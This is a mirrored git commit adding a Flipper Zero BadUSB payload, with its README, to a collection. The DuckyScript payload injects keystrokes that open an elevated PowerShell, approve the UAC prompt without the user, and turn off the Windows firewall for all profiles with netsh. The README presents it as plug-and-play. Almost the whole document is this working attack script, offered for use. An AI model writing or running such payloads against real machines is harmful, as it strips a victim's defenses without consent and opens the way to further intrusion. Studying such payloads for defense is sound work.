mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-18 17:51:30 +00:00
Adding lost UNC0V3R3D BadUSB Collection
This commit is contained in:
+19
@@ -0,0 +1,19 @@
|
||||
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
||||
REM Description: Disables the Windows-Firewall.
|
||||
REM Version: 1.0
|
||||
REM Category: Execution
|
||||
DELAY 750
|
||||
WINDOWS d
|
||||
DELAY 850
|
||||
WINDOWS r
|
||||
DELAY 900
|
||||
STRING powershell Start-Process powershell -Verb runAs
|
||||
ENTER
|
||||
DELAY 750
|
||||
LEFTARROW
|
||||
ENTER
|
||||
DELAY 900
|
||||
ALT y
|
||||
DELAY 900
|
||||
STRING netsh advfirewall set allprofiles state off; exit
|
||||
ENTER
|
||||
@@ -0,0 +1,43 @@
|
||||
|
||||
# DisableFirewall
|
||||
|
||||
This script disables the windows firewall.
|
||||
|
||||
|
||||
|
||||
## How to use?
|
||||
|
||||
This script is plug and play. Just plug the Flipper in and run the script.
|
||||
|
||||
|
||||
|
||||
|
||||
## Features
|
||||
|
||||
- open powershell
|
||||
- disable windows firewall
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Feedback
|
||||
|
||||
If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Support
|
||||
|
||||
For support, contact me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
## Meta
|
||||
|
||||
|
||||
- If you want to sponsor me on Patreon, the link is on my profile.
|
||||
|
||||
|
||||
Reference in New Issue
Block a user